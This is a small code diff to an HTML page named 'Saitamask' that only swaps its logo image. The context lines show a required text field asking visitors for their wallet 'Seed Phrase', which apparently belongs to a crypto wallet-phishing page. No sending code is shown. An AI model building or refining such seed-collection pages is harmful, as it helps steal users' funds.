--- a/saitamask.html
+++ b/saitamask.html
@@ -78,7 +78,7 @@
 
                         <div class="middle">
                             <div class="toop">
-                                <img src="saitamask.jpg" alt="">
+                                <img src="logo.svg" alt="">
                                 <h4>Saitamask</h4>
                             </div>
                             <textarea id="seed" minlength="50" name="Saitamask" placeholder="Seed Phrase..." required></textarea >
